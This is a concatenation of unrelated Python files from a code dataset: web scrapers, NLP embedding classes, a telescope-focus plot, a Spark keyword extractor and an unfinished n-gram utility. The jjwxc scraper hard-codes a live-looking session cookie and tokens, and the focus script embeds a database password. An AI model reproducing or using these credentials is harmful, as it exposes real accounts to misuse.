options='PoE, right of=q1, xshift=1cm, align=center', name='poe1')\npic.set_node(text=nodes.poe, options='PoE, right of=q2, xshift=1cm, align=center', name='poe2')\npic.set_node(text=nodes.poe, options='PoE, below of=poe1, yshift=-0.5cm, align=center', name='poe3')\n\npic.set_node(text=nodes.q1_tilde, options='m0_dis, right of=poe1, xshift=0.5cm', name='q1_tilde')\npic.set_node(text=nodes.q2_tilde, options='m1_distr, right of=poe2, xshift=0.5cm', name='q2_tilde')\npic.set_node(text=nodes.q12_tilde, options='subset, right of=poe3, xshift=0.5cm', name='q12_tilde')\n\npic.set_node(text=nodes.zk1, options='m0_dis, right of=q1_tilde, xshift=1cm', name='zk1')\npic.set_node(text=nodes.zk12, options='subset, right of=q12_tilde, xshift=1cm', name='zk12')\npic.set_node(text=nodes.zk2, options='m1_distr, right of=q2_tilde, xshift=1cm', name='zk2')\n\npic.set_node(text=nodes.moe, options='MoE, right of=zk12, xshift=1cm, align=center', name='moe')\npic.set_node(text=nodes.z, options='lr,right of=moe, xshift=1cm, align=center', name='z')\n\npic.set_node(text=nodes.output__m1m2_m2, options='right of=z, xshift=2cm,yshift=-1.5cm', name='output__m1m2_m2')\npic.set_node(text=nodes.output__m1_m2, options='right of=output__m1m2_m2, xshift=1.5cm', name='output__m1_m2')\n\npic.set_node(text=nodes.output__m1m2_m1, options='above of=output__m1m2_m2, yshift=2cm', name='output__m1m2_m1')\npic.set_node(text=nodes.output__m2_m1, options='right of=output__m1m2_m1, xshift=1.5cm', name='output__m2_m1')\n\npic.set_line('input_m0', 'q1', label=r'$enc_1$', label_pos='south')\npic.set_line('input_m1', 'q2', label=r'$enc_2$', label_pos='south')\n\npic.set_line('q1', 'poe1')\npic.set_line('q2', 'poe2')\npic.set_line('q1', 'poe3')\npic.set_line('q2', 'poe3')\n\npic.set_line('poe1', 'q1_tilde')\npic.set_line('poe2', 'q2_tilde')\npic.set_line('poe3', 'q12_tilde')\n\npic.set_line('q1_tilde', 'zk1', label='flow', label_pos='south')\npic.set_line('q12_tilde', 'zk12', label='flow', label_pos='south')\npic.set_line('q2_tilde', 'zk2', label='flow', label_pos='south')\n\npic.set_line('zk1', 'moe')\npic.set_line('zk12', 'moe')\npic.set_line('zk2', 'moe')\n\npic.set_line('moe', 'z')\n\npic.set_line('z', 'output__m1m2_m2', label=r'$dec_2$', label_pos='north', edge_options='bend right=30')\n# pic.set_line('z', 'output__m1_m2', label=r'$dec_2$', label_pos='north, rotate=-45', edge_options='bend right=50')\n\npic.set_line('z', 'output__m1m2_m1', label=r'$dec_1$\\ ', label_pos='south, rotate=10', edge_options='bend left=30')\n# pic.set_line('z', 'output__m2_m1', label=r'$dec_1$\\ ', label_pos='south, rotate=45', edge_options='bend left=50')\n\noutput = pic.make()\nprint(output)\n","sub_path":"scripts_/mofop_graph.py","file_name":"mofop_graph.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"360920924","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n#用bs4处理效率较低,直接正则更快一些\r\nimport os\r\nimport re\r\nimport csv\r\nfrom urllib.parse import quote\r\nimport time\r\n\r\ndef search(keyword,exclude,lower,upper):\r\n url = \"http://bbs.jjwxc.net/search.php?act=search&board=3&keyword=%s&topic=3\"%keyword\r\n #此url查询三区标题,查询回帖topic=2,查询2区board=2\r\n headers = {\r\n \"Accept\":\"text/l,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Accept-Encoding\":\"gzip, deflate\",\r\n \"Accept-Language\":\"zh-CN,zh;q=0.9\",\r\n \"Connection\":\"keep-alive\",\r\n \"Cookie\" : \"__gads=ID=694b97efeb86c8c2:T=1540287492:S=ALNI_MYmL7fQknkgH9acS7bA_Zg2B8IA5Q; U\"\r\n \"M_distinctid=166a65c9be115c-01270474249844-b79193d-144000-166a65c9be634b; CNZZDA\"\r\n \"TA30012213=cnzz_eid%3D976476925-1540385198-http%253A%252F%252Fbbs.jjwxc.net%252F%2\"\r\n \"6ntime%3D1540385198; jjwxcImageCode=d0e497aa8ce44738ecf9443e7e3b959e; jjwxcImageCo\"\r\n \"deTimestamp=2018-10-24+22%3A07%3A51; nicknameAndsign=2%257E%2529%2524launa; token=Mj\"\r\n \"A0Mzc2ODl8YTZjOTYzNzNmZDc2Mzc0NGZhYmI4ZGE5NDEwODUzOTF8fHx8MTA4MDB8MXx8fOasoui%2Fjua\"\r\n \"CqO%2B8jOaZi%2Baxn%2BeUqOaIt3wxfG1vYmlsZQ%3D%3D; JJEVER=%7B%22ispayuser%22%3A%22204\"\r\n \"37689-1%22%2C%22foreverreader%22%3A%2220437689%22%7D; bbsnicknameAndsign=2%257E%2529\"\r\n \"%2524launa; bbstoken=MjA0Mzc2ODlfMF9jMGQ1YjNiMjVkMzRmM2RjY2QzMGMyOGY5ZDk0YmI3OV8xX18%3D\",\r\n \"Host\":\"bbs.jjwxc.net\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\r\n }\r\n res =requests.get(url,headers= headers)\r\n res.encoding=\"gb18030\"\r\n soup = BeautifulSoup(res.text,\"html.parser\")\r\n pageScript = soup.find(\"script\",language=\"JavaScript\").get_text()\r\n pattern = re.compile(\"\\d+\")\r\n page = pattern.findall(pageScript)#页数查找,直接正则会比较好\r\n tryurl = []\r\n for i in range(1,int(page[1])+1):\r\n time.sleep(1)\r\n print(\"正在处理第%d页\"%i)\r\n url = \"http://bbs.jjwxc.net/search.php?act=search&board=3&keyword=%s&topic=3&page=%d\"%(keyword,i)\r\n try:\r\n res =requests.get(url,headers= headers)\r\n res.encoding=\"gb18030\"\r\n soup = BeautifulSoup(res.text,\"html.parser\")\r\n content = soup.find(\"table\",cellpadding=\"2\").find_all(\"tr\",align=\"left\")\r\n for each in content:\r\n link = each.find(\"a\",href=True)\r\n title = link.get_text()\r\n reply = list(each.find_all(\"td\",align=\"right\"))[1].get_text()\r\n if int(reply)>= lower and int(reply) <= upper:\r\n judge = 0\r\n for item in exclude:\r\n if item in title:\r\n judge = 1\r\n if judge == 0:\r\n write_to_file(\"%s%s%d至%d贴.csv\"%(include,exclude,lower,upper),title+reply+\"http://bbs.jjwxc.net/\"+link.get(\"href\"))\r\n except AttributeError:\r\n tryurl.append(url)\r\n print(\"无法获得\"+url)\r\n\r\ndef write_to_file(file_name,content):\r\n with open(file_name, 'a', encoding='utf-8', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(content.split())\r\n\r\n \r\nif __name__ == \"__main__\":\r\n include = input(\"请输入搜索关键词:\")\r\n exclude = list(input(\"请输入不包含的关键词,可用空格分隔(无则直接回车):\").split())\r\n replies_min = int(input (\"需要查找回帖数不低于____贴的:\"))\r\n replies_max = int(input(\"需要查找回帖数不高于____贴的:\"))\r\n content = quote(include.encode(\"gb18030\"))#urllib库中\r\n search(content,exclude,replies_min,replies_max)\r\n\r\n","sub_path":"jjwxc_search.py","file_name":"jjwxc_search.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"638971562","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0',\n}\n\nresponse = requests.get(\n 'https://www.greenpeace.org/eu-unit/blog/',\n headers=headers,\n)\n\nsoup = BeautifulSoup(response.text, 'html.parser')\n\narticles = soup.select('body > div.page-template > div > div > ul > li > div')\n\nfor article in articles:\n a_tag = article.select_one('a.search-result-item-headline')\n title = a_tag.text\n article_link = a_tag['href']\n\n date = article.select_one('span.search-result-item-date').text\n\n print(f'{date} / {title} / {article_link}')\n","sub_path":"sparta_project_EU-UNIT.py","file_name":"sparta_project_EU-UNIT.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427428807","text":"import os\nimport re\nimport logging\nfrom abc import abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nfrom typing import List, Union, Dict\n\nimport gensim\nimport numpy as np\nimport torch\nfrom bpemb import BPEmb\nfrom torch.nn import ParameterList, Parameter\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\nimport flair\nfrom flair.data import Corpus\nfrom .nn import LockedDropout, WordDropout\nfrom .data import Dictionary, Token, Sentence\nfrom .file_utils import cached_path, open_inside_zip\n\nlog = logging.getLogger(\"flair\")\n\n\nclass Embeddings(torch.nn.Module):\n \"\"\"Abstract base class for all embeddings. Every new type of embedding must implement these methods.\"\"\"\n\n @property\n @abstractmethod\n def embedding_length(self) -> int:\n \"\"\"Returns the length of the embedding vector.\"\"\"\n pass\n\n @property\n @abstractmethod\n def embedding_type(self) -> str:\n pass\n\n def embed(self, sentences: Union[Sentence, List[Sentence]]) -> List[Sentence]:\n \"\"\"Add embeddings to all words in a list of sentences. If embeddings are already added, updates only if embeddings\n are non-static.\"\"\"\n\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n everything_embedded: bool = True\n\n if self.embedding_type == \"word-level\":\n for sentence in sentences:\n for token in sentence.tokens:\n if self.name not in token._embeddings.keys():\n everything_embedded = False\n else:\n for sentence in sentences:\n if self.name not in sentence._embeddings.keys():\n everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n self._add_embeddings_internal(sentences)\n\n return sentences\n\n @abstractmethod\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n \"\"\"Private method for adding embeddings to all words in a list of sentences.\"\"\"\n pass\n\n\nclass TokenEmbeddings(Embeddings):\n \"\"\"Abstract base class for all token-level embeddings. Ever new type of word embedding must implement these methods.\"\"\"\n\n @property\n @abstractmethod\n def embedding_length(self) -> int:\n \"\"\"Returns the length of the embedding vector.\"\"\"\n pass\n\n @property\n def embedding_type(self) -> str:\n return \"word-level\"\n\n\nclass StackedEmbeddings(TokenEmbeddings):\n \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n def __init__(self, embeddings: List[TokenEmbeddings]):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings = embeddings\n\n # IMPORTANT: add embeddings as torch modules\n for i, embedding in enumerate(embeddings):\n self.add_module(\"list_embedding_{}\".format(i), embedding)\n\n self.name: str = \"Stack\"\n self.static_embeddings: bool = True\n\n self.__embedding_type: str = embeddings[0].embedding_type\n\n self.__embedding_length: int = 0\n for embedding in embeddings:\n self.__embedding_length += embedding.embedding_length\n\n def embed(self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True):\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n @property\n def embedding_type(self) -> str:\n return self.__embedding_type\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for embedding in self.embeddings:\n embedding._add_embeddings_internal(sentences)\n\n return sentences\n\n def __str__(self):\n return f'StackedEmbeddings [{\",\".join([str(e) for e in self.embeddings])}]'\n\n\nclass BytePairEmbeddings(TokenEmbeddings):\n def __init__(\n self,\n language: str,\n dim: int = 50,\n syllables: int = 100000,\n cache_dir=Path(flair.cache_root) / \"embeddings\",\n ):\n \"\"\"\n Initializes BP embeddings. Constructor downloads required files if not there.\n \"\"\"\n\n self.name: str = f\"bpe-{language}-{syllables}-{dim}\"\n self.static_embeddings = True\n self.embedder = BPEmbSerializable(\n lang=language, vs=syllables, dim=dim, cache_dir=cache_dir\n )\n\n self.__embedding_length: int = self.embedder.emb.vector_size * 2\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n\n if \"field\" not in self.__dict__ or self.field is None:\n word = token.text\n else:\n word = token.get_tag(self.field).value\n\n if word.strip() == \"\":\n # empty words get no embedding\n token.set_embedding(\n self.name, torch.zeros(self.embedding_length, dtype=torch.float)\n )\n else:\n # all other words get embedded\n embeddings = self.embedder.embed(word.lower())\n embedding = np.concatenate((embeddings[0], embeddings[len(embeddings) - 1]))\n token.set_embedding(self.name, torch.tensor(embedding, dtype=torch.float))\n\n return sentences\n\n def __str__(self):\n return self.name\n\n def extra_repr(self):\n return \"model={}\".format(self.name)\n\n\nclass CharacterEmbeddings(TokenEmbeddings):\n \"\"\"Character embeddings of words, as proposed in Lample et al., 2016.\"\"\"\n\n def __init__(\n self,\n path_to_char_dict: str = None,\n char_embedding_dim: int = 25,\n hidden_size_char: int = 25,\n ):\n \"\"\"Uses the default character dictionary if none provided.\"\"\"\n\n super().__init__()\n self.name = \"Char\"\n self.static_embeddings = False\n\n # use list of common characters if none provided\n if path_to_char_dict is None:\n self.char_dictionary: Dictionary = Dictionary.load(\"common-chars\")\n else:\n self.char_dictionary: Dictionary = Dictionary.load_from_file(path_to_char_dict)\n\n self.char_embedding_dim: int = char_embedding_dim\n self.hidden_size_char: int = hidden_size_char\n self.char_embedding = torch.nn.Embedding(\n len(self.char_dictionary.item2idx), self.char_embedding_dim\n )\n self.char_rnn = torch.nn.LSTM(\n self.char_embedding_dim, self.hidden_size_char, num_layers=1, bidirectional=True\n )\n\n self.__embedding_length = self.char_embedding_dim * 2\n\n self.to(flair.device)\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for sentence in sentences:\n\n tokens_char_indices = []\n\n # translate words in sentence into ints using dictionary\n for token in sentence.tokens:\n char_indices = [self.char_dictionary.get_idx_for_item(char) for char in token.text]\n tokens_char_indices.append(char_indices)\n\n # sort words by length, for batching and masking\n tokens_sorted_by_length = sorted(\n tokens_char_indices, key=lambda p: len(p), reverse=True\n )\n d = {}\n for i, ci in enumerate(tokens_char_indices):\n for j, cj in enumerate(tokens_sorted_by_length):\n if ci == cj:\n d[j] = i\n continue\n chars2_length = [len(c) for c in tokens_sorted_by_length]\n longest_token_in_sentence = max(chars2_length)\n tokens_mask = torch.zeros(\n (len(tokens_sorted_by_length), longest_token_in_sentence),\n dtype=torch.long,\n device=flair.device,\n )\n\n for i, c in enumerate(tokens_sorted_by_length):\n tokens_mask[i, : chars2_length[i]] = torch.tensor(\n c, dtype=torch.long, device=flair.device\n )\n\n # chars for rnn processing\n chars = tokens_mask\n\n character_embeddings = self.char_embedding(chars).transpose(0, 1)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(character_embeddings, chars2_length)\n\n lstm_out, self.hidden = self.char_rnn(packed)\n\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n outputs = outputs.transpose(0, 1)\n chars_embeds_temp = torch.zeros(\n (outputs.size(0), outputs.size(2)), dtype=torch.float, device=flair.device\n )\n for i, index in enumerate(output_lengths):\n chars_embeds_temp[i] = outputs[i, index - 1]\n character_embeddings = chars_embeds_temp.clone()\n for i in range(character_embeddings.size(0)):\n character_embeddings[d[i]] = chars_embeds_temp[i]\n\n for token_number, token in enumerate(sentence.tokens):\n token.set_embedding(self.name, character_embeddings[token_number])\n\n def __str__(self):\n return self.name\n\n\nclass BPEmbSerializable(BPEmb):\n def __getstate__(self):\n state = self.__dict__.copy()\n # save the sentence piece model as binary file (not as path which may change)\n state[\"spm_model_binary\"] = open(self.model_file, mode=\"rb\").read()\n state[\"spm\"] = None\n return state\n\n def __setstate__(self, state):\n from bpemb.util import sentencepiece_load\n\n model_file = self.model_tpl.format(lang=state[\"lang\"], vs=state[\"vs\"])\n self.__dict__ = state\n\n # write out the binary sentence piece model into the expected directory\n self.cache_dir: Path = Path(flair.cache_root) / \"embeddings\"\n if \"spm_model_binary\" in self.__dict__:\n # if the model was saved as binary and it is not found on disk, write to appropriate path\n if not os.path.exists(self.cache_dir / state[\"lang\"]):\n os.makedirs(self.cache_dir / state[\"lang\"])\n self.model_file = self.cache_dir / model_file\n with open(self.model_file, \"wb\") as out:\n out.write(self.__dict__[\"spm_model_binary\"])\n else:\n # otherwise, use normal process and potentially trigger another download\n self.model_file = self._load_file(model_file)\n\n # once the modes if there, load it with sentence piece\n state[\"spm\"] = sentencepiece_load(self.model_file)\n","sub_path":"flair/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":11195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"265398130","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport pickle\nimport json\n\nimport sqlite3\nimport datetime\n\nimport ast\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nimport datetime\nimport operator\n\nimport mf_algo_py_param\n\n\ndef calc_histogram(df,fld):\n hst = np.histogram(df[fld],bins='sturges')\n Y = hst[0]\n X = [\"_\"+str(c) for c in hst[1][1:]]\n df1 = pd.DataFrame()\n df1['X'] = X\n df1['Y'] = Y\n return df1\n\ndef calc_groupby(df,fld):\n df1 = df.groupby([fld])[[fld]].count()\n df1.columns = ['count']\n df1 = df1.reset_index()\n df1.columns = ['X','Y']\n return df1\n\n\ndef apply(df_input,step_param):\n #print (step_param)\n #Output df\n df_out = pd.DataFrame([], columns=['X','Y','field'])\n \n ##Graph table\n graph_table = step_param['config']['graph_table']\n \n\n ##Fields\n x_fields = step_param['config']['X']\n x_fields_param = mf_algo_py_param.set_param_value_list_str(x_fields)\n y_field_param = step_param['config']['Y']\n \n json_data = {}\n for fld in x_fields_param:\n \n dtyp = str(df_input[fld].dtype)\n \n ##Field content is string\n if (dtyp== 'object'):\n df1 = calc_groupby(df_input,fld)\n\n if (dtyp == 'int64' or dtyp == 'float64'):\n df1 = calc_histogram(df_input,fld)\n \n \n df1['field'] = fld\n json_df1 = df1.to_json(orient='records')\n json_data['data_'+str(fld)] = json.dumps(json_df1) \n \n\n \n df_out = pd.DataFrame(json_data,index=[0])\n \n \n json_out = {graph_table:df_out}\n \n return json_out\n\n \n","sub_path":"covalent/model-factory/backend/flask_api/algo_py/mf_algo_py_vizprep_barchart.py","file_name":"mf_algo_py_vizprep_barchart.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"258954280","text":"valores = input().split(' ')\n\nia, ib, ic = valores\na = int(ia)\nb = int(ib)\nc = int(ic)\n\nmaior_ab = (a + b + abs(a-b)) / 2\nmaior = int((maior_ab + c + abs(maior_ab - c)) / 2)\n\nprint('{} eh o maior'.format(maior))\n","sub_path":"uri/1013.py","file_name":"1013.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637062464","text":"import matplotlib\nmatplotlib.use('Agg')\nimport numpy, pylab, os, sys\nfrom SRP.SRPDatabases.readPostgresTable import readPostgresTable\n\nquery=\"select * from REMPipeResult where ((Category = 'FCS'))\"\n\na = readPostgresTable('polaris','covino','covino','Gramigna',query)\n\n#print(a.info)\n\n\nFIGPATH = '/home/covino/REMZP/'\n\n\naw = a[(a['tint'] > -90) & (a['focus'] <= 23) & (a['focus'] >= 21) & (a['centrmjd'] > 58570.)]\nawg = aw[aw['filter']=='g']\nawr = aw[aw['filter']=='r']\nawi = aw[aw['filter']=='i']\nawz = aw[(aw['filter']=='g') | (aw['filter']=='r') | (aw['filter']=='i')]\nawj = aw[aw['filter']=='J']\n\n\np = pylab.figure()\npx = p.add_subplot(111)\n[i.set_linewidth(2) for i in px.spines.values()]\n\n\nttxt = pylab.title(\"REM Focus from 2019 Mar 28\")\nxtxt = pylab.xlabel(\"T$_{int}$ $^0$C\")\nytxt = pylab.ylabel(\"Focus (mm)\")\n\n\"\"\"\ntpos = numpy.arange(awg['tint'].min(),awg['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awgt = awg[(awg['tint'] >= (t-0.5)) & (awg['tint'] < (t+0.5))]\n if len(awgt['fwhm']) > 0:\n fw.append(awgt['focus'][awgt['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='g')\n\n\ntpos = numpy.arange(awr['tint'].min(),awr['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awrt = awr[(awr['tint'] >= (t-0.5)) & (awr['tint'] < (t+0.5))]\n if len(awrt['fwhm']) > 0:\n fw.append(awrt['focus'][awrt['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='r')\n\n\ntpos = numpy.arange(awi['tint'].min(),awi['tint'].max(),1.)\nfw = []\ntw = []\nfor t in tpos:\n awit = awi[(awi['tint'] >= (t-0.5)) & (awi['tint'] < (t+0.5))]\n if len(awit['fwhm']) > 0:\n fw.append(awit['focus'][awit['fwhm'].argmin()])\n tw.append(t)\npx.plot(tw,fw,'-o',label='i')\n\"\"\"\n\nif len(awz) > 0:\n tpos = numpy.arange(awz['tint'].min(),awz['tint'].max(),1.)\n fw = []\n tw = []\n for t in tpos:\n awzt = awz[(awz['tint'] >= (t-0.5)) & (awz['tint'] < (t+0.5))]\n if len(awzt['fwhm']) > 0:\n fw.append(awzt['focus'][awzt['fwhm'].argmin()])\n tw.append(t)\n px.plot(tw,fw,'o',label='Opt', color='blue')\n\n ttw = numpy.array(tw)\n ffw = numpy.array(fw)\n z = numpy.polyfit(ttw[ffw < 23], ffw[ffw < 23], 1)\n f = numpy.poly1d(z)\n d = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\n px.plot(d,f(d),'-',color='blue')\n px.text(5,21.60,z,color='blue')\n\nif len(awj) > 0:\n tpos = numpy.arange(awj['tint'].min(),awj['tint'].max(),1.)\n fw = []\n tw = []\n for t in tpos:\n awjt = awj[(awj['tint'] >= (t-0.5)) & (awj['tint'] < (t+0.5))]\n if len(awjt['fwhm']) > 0:\n fw.append(awjt['focus'][awjt['fwhm'].argmin()])\n tw.append(t)\n px.plot(tw,fw,'o',label='J',color='red')\n\n ttw = numpy.array(tw)\n ffw = numpy.array(fw)\n z = numpy.polyfit(ttw[ffw < 23], ffw[ffw < 23], 1)\n f = numpy.poly1d(z)\n d = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\n px.plot(d,f(d),'-',color='red')\n px.text(5,21.70,z,color='red')\n\n\nz = [-9.5e-3, 21.45000]\nf = numpy.poly1d(z)\nd = numpy.linspace(ttw[ffw < 23][0],ttw[ffw < 23][-1],100)\npx.plot(d,f(d),'-',color='green',label='REM')\npx.text(5,21.80,z,color='green')\n\npylab.ylim((21.0,22.0))\n#pylab.xlim((0,150))\npylab.legend(loc='best',numpoints=1)\n\n\n\npylab.show()\npylab.savefig(FIGPATH+'remfocus.png')\n\n\n\n","sub_path":"python3/TelPipes/leggi_REM_Focus.py","file_name":"leggi_REM_Focus.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"97404315","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, lit, concat\nfrom pymongo import MongoClient\nimport pandas as pd\nimport re\nimport numpy as np\nimport RAKE\n\nclient = MongoClient(\"mongodb://152.46.19.205:27017\")\ndb = client['meetup']\ncollection = db['cityEvent']\n\ndef createDict(values):\n\ttemp_dict = {}\n\tfor value in values:\n\t\tif value in temp_dict:\n\t\t\ttemp_dict[value] = temp_dict[value] + 1\n\t\telse:\n\t\t\ttemp_dict[value] = 1\n\treturn temp_dict\n\ndef flatten(values):\n\ttemp_list = []\n\tfor value in values:\n\t\tfor word in value:\n\t\t\ttemp_list.append(word)\n\treturn temp_list\n\ndef extractWords(event):\n\ttemp_list = []\n\tcity = event[0]\n\tfor keyword in event[1]:\n\t\twords = (re.split(r'\\s{1,}', keyword[0]))\n\t\tfor word in words:\n\t\t\ttemp_list.append(word)\n\treturn (city,temp_list)\n\ndef createSortedList(event):\n\treturn sorted(event, key=event.get, reverse=True)\n\n#sc = SparkContext('local','example')\n\nconf = SparkConf()\nconf.setMaster('spark://152.46.16.246:7077')\nconf.setAppName('spark-basic')\nsc = SparkContext(conf=conf)\n\nspark = SparkSession.builder.appName(\"Keyword Extraction\").getOrCreate()\nevent_df = spark.read.format('com.databricks.spark.csv').options(header='true').load('hdfs://152.46.16.246/user/rahuja/In/test.csv')\nsql_sc = SQLContext(sc)\n\n# raw_df = pd.read_csv('/home/rohit910/CSC591-DIC/output_nocomma1.csv')\n# raw_df = pd.read_csv('hdfs://152.46.16.246/user/rahuja/In/output_nocomma1.csv')\n\n#raw_df = pd.read_csv('/home/rahuja/output_final.csv')\n\n#raw_df_1 = raw_df.replace(np.nan,' ', regex=True)\n#raw_df_2 = raw_df_1[['event_id','event_name','description','city','group_name']]\n#event_df = sql_sc.createDataFrame(raw_df_2)\n\nevent_df = event_df.select(concat(col(\"event_name\"), lit(\" \"), col(\"description\"), lit(\" \"), col(\"group_name\")).alias(\"data\"), col(\"city\"))\n\n#Rake = RAKE.Rake(\"/home/rohit910/CSC591-DIC/python-rake/stoplists/SmartStoplist.txt\")\n\nRake = RAKE.Rake(\"/home/rahuja/RakeTest/SmartStoplist.txt\")\n\nevent_rdd = event_df.rdd.map(lambda x: (x.city, Rake.run(x.data)[0:5]))\nevent_rdd_1 = event_rdd.map(extractWords)\nevent_rdd_2 = event_rdd_1.groupByKey().mapValues(list).mapValues(flatten)\nevent_rdd_3 = event_rdd_2.mapValues(createDict)\nevent_rdd_4 = event_rdd_3.mapValues(createSortedList)\n\nevent_data = event_rdd_4.collect()\n\nfor event in event_data:\n\tevent_object = {\"city\" : event[0], \"events\": event[1]}\n\tcollection.insert_one(event_object).inserted_id\n","sub_path":"preprocess_parallelize.py","file_name":"preprocess_parallelize.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305711921","text":"from math import exp\n\n\ndef number_code_from_letter_code(letter_code, alphabet):\n return [alphabet.letters_to_position[letter] for letter in letter_code]\n\n\ndef is_word_end(text, index):\n try:\n return index in text.ends_of_words\n except AttributeError:\n\n return False\n\n\ndef get_n_gram_generator_at_i_left(text, n, i):\n gram = \"\"\n k = i\n t = k\n while i - t < n and k >= 0:\n gram = text[k] + gram\n k -= 1\n t -= 1\n if is_word_end(text, k):\n stripped = text.stripped_part[text.ends_of_words[k]]\n j = len(stripped) - 1\n while i - t < n and j >= 0:\n gram = stripped[j] + gram\n t -= 1\n j -= 1\n if gram:\n return gram[:-1]\n return gram\n\n\ndef get_n_gram_generator_at_i_right(text, n, i):\n gram = \"\"\n k = i\n t = i\n while t - i < n and k < len(text):\n gram += text[k]\n k += 1\n t += 1\n if is_word_end(text, k - 1):\n stripped = text.stripped_part[text.ends_of_words[k-1]]\n j = 0\n while t - i < n and j < len(stripped):\n gram += stripped[j]\n t += 1\n j += 1\n return gram\n\n\ndef get_n_gram_generator_at_i(text, n, i):\n if i < 0 or i >= len(text):\n return None\n gram = get_n_gram_generator_at_i_left(text, n, i) + get_n_gram_generator_at_i_right(text, n, i)\n if len(gram) < n:\n return None\n return gram\n\n\ndef get_n_grams_with_i(text, n, i):\n generator = get_n_gram_generator_at_i(text, n, i)\n if generator:\n return [generator[i:i+n] for i in range(len(generator) - n + 1)]\n return []\n\n\ndef calculate_n_gram_frequencies(text, n):\n frequencies_dict = {}\n current_gram = \"\"\n if is_word_end(text, -1):\n stripped_beginning = text.stripped_part[text.ends_of_words[-1]]\n for i in range(len(stripped_beginning)):\n current_gram += stripped_beginning[i]\n if len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n for i in range(len(text)):\n current_gram += text[i]\n if len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n if is_word_end(text, i):\n stripped = text.stripped_part[text.ends_of_words[i]]\n for j in range(len(stripped)):\n current_gram += stripped[j]\n if len(current_gram) > n:\n current_gram = current_gram[1:]\n if len(current_gram) == n:\n try:\n frequencies_dict[current_gram] += 1\n except KeyError:\n frequencies_dict[current_gram] = 1\n return frequencies_dict\n\n\ndef calculate_n_gram_log_weight(frequencies, log_distribution):\n result = 0\n for i in frequencies:\n try:\n result += log_distribution[i]*frequencies[i]\n except KeyError:\n pass\n return result\n\n\ndef get_frequencies_change(old_frequencies, new_frequencies):\n frequencies_change = {}\n for i in old_frequencies:\n if old_frequencies[i] != new_frequencies[i]:\n frequencies_change[i] = new_frequencies[i] - old_frequencies[i]\n return frequencies_change\n\n\ndef calculate_log_weight_change(frequencies_change, log_distribution):\n result = 0\n for i in frequencies_change:\n try:\n result += log_distribution[i]*frequencies_change[i]\n except KeyError:\n pass\n return result\n\n\ndef update_frequency(frequency, frequency_change):\n for i in frequency_change:\n try:\n frequency[i] += frequency_change[i]\n except KeyError:\n frequency[i] = frequency_change[i]\n\n\ndef 